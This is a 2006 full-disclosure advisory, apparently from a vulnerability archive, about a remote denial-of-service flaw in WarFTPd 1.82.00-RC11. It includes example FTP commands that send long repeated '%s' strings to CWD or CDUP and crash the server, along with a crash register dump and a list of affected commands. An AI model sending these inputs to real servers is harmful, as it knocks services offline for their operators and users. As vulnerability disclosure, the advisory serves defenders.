[Full-disclosure] WarFTPd 1.82.00-RC11 Remote Denial Of Service

2006-11-07T00:00:00
ID SECURITYVULNS:DOC:14957
Type securityvulns
Reporter Securityvulns
Modified 2006-11-07T00:00:00

Description

WarFTPd 1.82.00-RC11 Remote Denial Of Service

WarFTPd is vulnerable to a DOS condition when passing to various commands a long string with two times the "%s" character(s) inside. It looks as non exploitable as the problem crashes with the same output at the same instruction and address regarding or regardless of the buffer size and the %${char} passed. Maybe another one founds it vulnerable.

Example:

$ ftp target (Banner) ftp> quote user anonymous ftp> quote pass bla ftp> cwd %s*256

or

ftp> cdup %s*256

Server will crash as follows:

EAX 00000001 ECX 00000073 EDX 00000002 EBX 0079E890 ESP 0079E7A0 EBP 00A55A8A ASCII "s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s(...more %s characters)" ESI 0079E7DE EDI 0000000A EIP 00431540 war-ftpd.00431540

00431540 8A08 MOV CL,BYTE PTR DS:[EAX]

Only one shoot is needed. Any file related operation will crash. It was found during an ftp fuzzing session.

The following commands found vulnerables (at least):

    CWD
    CDUP
    DELE
    NLST
    LIST
    SIZE

Well, any file related operation. Attached goes a Python exploit.

Disclaimer

The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.


Contact

Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es


LLama Gratis a cualquier PC del Mundo. Llamadas a fijos y moviles desde 1 centimo por minuto. http://es.voice.yahoo.com